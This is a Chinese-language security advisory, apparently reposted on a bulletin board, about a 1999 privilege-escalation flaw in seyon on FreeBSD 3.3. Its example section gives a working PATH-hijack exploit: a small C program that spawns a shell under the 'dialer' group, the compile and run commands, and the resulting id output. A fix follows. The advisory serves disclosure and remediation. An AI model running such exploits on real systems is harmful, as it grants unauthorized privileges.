FreeBSD 3.3 seyon漏洞
概述:
FreeBSD 3.3-RELEASE版的安装光盘中带有seyon v2.14b软件包。这个版本(
包含以前?)存在安全漏洞,
允许任意用户获得seyon所属组的特权。当缺省安装时,seyon被设置了SGID位 "
dialer".
注意:不同版本的seyon和不同的2.14b包可能被设置了不同的属性。
漏洞详述:
syon执行时会先执行"seyon-emu"和"xterm",但这两个程序的路径并没有用
绝对路径,因此通过在$PATH中
增加一个用户可写目录并将用户自己的"seyon-emu"或"xterm"放到该目录下。
用户就可以让seyon以组ID "dialer"的身份来运行它们,从而获得"dialer"组
的特权。
漏洞实例:
bash-2.03$ uname -a; id; ls -la `which seyon`
FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GM
T 1999
[email protected]:/usr/src/sys/compile/GENERIC i386
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
-rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon
bash-2.03$ cat > seyonx.c
void main () {
setregid(getegid(), getegid());
system("/usr/local/bin/bash");
}
^D
bash-2.03$ gcc -o seyon-emu seyonx.c
bash-2.03$ PATH=.:$PATH
bash-2.03$ seyon
bash-2.03$ id
uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec)
bash-2.03$
解决方案:
chmod 750 `which seyon` 并将需要运行seyon的用户增加到"dialer"组中。
来源:Brock Tellier ([email protected])
--
欢迎大家常来回合策略 宗教信仰坐坐。
欢迎光临魔法师学院http://wwwmagic.126.com
* * * * *
无挂碍故无有恐怖
--DOS--
※ 来源:.网易虚拟社区北京站 http://bj.netease.com.[FROM: 202.106.250.252]
|
|